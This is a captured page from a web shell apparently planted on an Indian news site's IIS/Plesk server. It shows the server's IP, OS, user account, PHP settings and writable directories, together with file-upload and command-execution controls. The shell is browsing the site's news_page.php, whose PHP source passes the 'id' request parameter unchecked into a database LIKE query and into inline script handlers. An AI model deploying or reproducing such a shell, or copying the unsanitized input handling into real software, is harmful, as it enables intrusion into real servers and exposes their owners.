403Webshell
Server IP : 103.118.17.23  /  Your IP : 216.73.216.32
Web Server : Microsoft-IIS/10.0
System : Windows NT RESELLERPLESK22 10.0 build 20348 (Windows Server 2016) AMD64
User : IWAM_plesk(default) ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/vhosts/mesa.org.in/httpdocs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/vhosts/mesa.org.in/httpdocs//news_page.php
<?php require './qcubed.inc.php'; ?>
<link href="dist/css/jplist.demo-pages.css" rel="stylesheet" type="text/css" />

<?php require './header.inc.php'; ?>

<!-- main content -->
<div class="box col-md-12 nopad">
    <!-- demo -->
    <div id="demo" class="box jplist">
        <!-- panel -->
        <div class="jplist-panel box panel-top">
            <div class="row">
          
                <!-- right side-->
            	<div class="col-md-8 pad5">			
                    <div class="list box  text-shadow shadow1">
                        <?php
                            $option  = Option::LoadByIdoption($_GET['id']);
                        ?>
                          &nbsp; &nbsp;<h4><b>&nbsp; &nbsp;<?php _P($option->Name)?> </b></h4>
                    </div>
                
                    <!-- data -->
                    <div class="list box text-shadow shadow1"  >
                        <?php
                        $id=$_GET['id'];
                            $items  = News::QueryArray(
                                            QQ::AndCondition(
                                                QQ::Like(QQN::News()->Cats, "%$id%")
                                            ),QQ::OrderBy(QQN::News()->Idnews, 'DESC') 
                                        );
                            foreach($items as $item){
                                    $headline = $item->Headline;
                                    $subheadline = $item->SubHeadline;
                                    $alias = $item->Alias;
                                    $img = $item->Upload;
                                    $date = $item->Date;
                                    $by = $item->ByObject->Username;
                        ?>
                        <link href="assets_web/css/style.css" rel="stylesheet" type="text/css"/>
                            <div class="list-item box col-8 col-sm-12 col-md-4 col-lg-4 items" style="height:270px !important; width:100% !important ">
                                <div style="padding-top:0px !important;" class="align-center">
                                    <img onclick='window.location.href = "news-one-page.php?newsid=<?php _p($item->Idnews); ?>&&cat=<?php _p($_GET['id']); ?>";' class="img-fluid d-block mx-auto" src="<?php _p($img); ?>"
                                        onerror="this.onerror=null;this.src='assets_web/img/no_img.png';"
                                    <br><br>
                                    <h5 style=" cursor: pointer;" onclick='window.location.href = "news-one-page.php?newsid=<?php _p($item->Idnews); ?>&&cat=<?php _p($_GET['id']); ?>";' style="color:black"><?php _p($headline); ?></h5>
                                     
                                </div>
                            </div>
                             
                        <?php } ?>
                    </div>
                </div>
                
                
                      <!-- left side-->
            	<div class=" col-md-4 fix-filter shadow1 nopad">
                    <div>
                        <div>
                            <h4 style="margin-top:2px;"><b>Follow Us!</b></h4>
                        </div>
                        <div style="margin-top:10px; margin-left: 10px">
                            <div onclick="go_to_page('https://www.facebook.com/www.kharidome/');">
                                    <i  class="fa fa-facebook-f " style="display:inline-block;font-size:20px;text-align:center;padding:8px 0px;margin-bottom:3px;margin-top:0px; background-color:#fff;margin-right:5px;cursor:pointer;float:left;width:35px;border-radius:10px;height:30x;
                                        background-color:#3B5998; color:#FFF">
                                    </i>
                            </div>
                            <div onclick="go_to_page('https://twitter.com/kharidome');">
                                    <i  class="fa fa-twitter " style="display:inline-block;font-size:20px;text-align:center;padding:8px 0px;margin-bottom:3px;margin-top:0px; background-color:#fff;margin-right:5px;cursor:pointer;float:left;width:35px;border-radius:10px;height:30x;background-color:#00C6FF; color:#FFF"></i>
                                    </div>
                            <div onclick="go_to_page('#');">
                                    <i  class="fa fa-linkedin " style="display:inline-block;font-size:20px;text-align:center;padding:8px 0px;margin-bottom:3px;margin-top:0px; background-color:#fff;margin-right:5px;cursor:pointer;float:left;width:35px;border-radius:10px;height:30x;background-color:#0077B5; color:#FFF"></i>
                                    </div>
                            <div onclick="go_to_page('https://chat.whatsapp.com/8NOb8KV8OQMEf7QhY9DB7A');">
                                    <i  class="fa fa-whatsapp " style="display:inline-block;font-size:20px;text-align:center;padding:8px 0px;margin-bottom:3px;margin-top:0px; background-color:#fff;margin-right:5px;cursor:pointer;float:left;width:35px;border-radius:10px;height:30x;background-color:#25d366; color:#FFF"></i>
                                    </div>
                            <div onclick="go_to_page('https://plus.google.com/u/1/116801836997552458373');">
                                    <i  class="fa fa-google-plus " style="display:inline-block;font-size:20px;text-align:center;padding:8px 0px;margin-bottom:3px;margin-top:0px; background-color:#fff;margin-right:5px;cursor:pointer;float:left;width:35px;border-radius:10px;height:30x;background-color:#dd4b39; color:#FFF"></i>
                            </div>
                        </div><br><br>
                        
                        <div>
                            <h4 style="margin-top:0px;" ><b>ट्रेडींग!</b></h4>
                            <div class="col" style="margin-top:5px; margin-bottom:5px; margin-left:0px; margin-right:0px; background-color:#fff;">
                                <div>
                                    <?php require './widgets/images_add.php'; ?>
                                </div>
                            </div>
                        </div>
                        
                        <div>
                            
                            <h4 style="margin-top:0px;" ><b>आणखी बातम्या!</b></h4>
                            <div>
                                <?php 
                                 $sr = 1;
                                 $items  =  News::QueryArray(
                                                QQ::OrCondition(
                                                    QQ::Like(QQN::News()->Cats ,'%44964%'),
                                                    QQ::Like(QQN::News()->Cats,'%44965%'),
                                                    QQ::Like(QQN::News()->Cats ,'%44966%'),
                                                    QQ::Like(QQN::News()->Cats ,'%44967%'),
                                                    QQ::Like(QQN::News()->Cats ,'%44968%'),
                                                    QQ::Like(QQN::News()->Cats ,'%44969%'),
                                                    QQ::Like(QQN::News()->Cats ,'%44970%'),
                                                    QQ::Like(QQN::News()->Cats , '%44971%'),
                                                    QQ::Like(QQN::News()->Cats ,'%44972%')
                                                ),QQ::OrderBy(QQN::News()->Idnews, 'DESC')     
                                            );
                                         
                                foreach($items as $item){
                                ?>
                                <?php $sr++; 
                
                                     if($sr <= 9){
                                ?>
                                    <div style="margin-left:10px">
                                      <h5 onclick='window.location.href = "news-one-page.php?newsid=<?php _p($item->Idnews); ?>&&cat=<?php _p($item->Cat); ?>";' >
                                          <i class="fa fa-sign-out" style="color:#EF0504"> </i> <?php _P($item->Headline)?>
                                      </h5><br>
                                    </div>
                                  <?php  } else{} ?> 
                            <?php }?>
                            </div>
                        </div>
                    </div>
                </div>
                
                
                
                
            </div>
        </div>
    </div>
    <!-- end of demo -->
</div>

<link href="assets_web/css/catlog.css" rel="stylesheet" type="text/css" />

Youez - 2016 - github.com/yon3zu
LinuXploit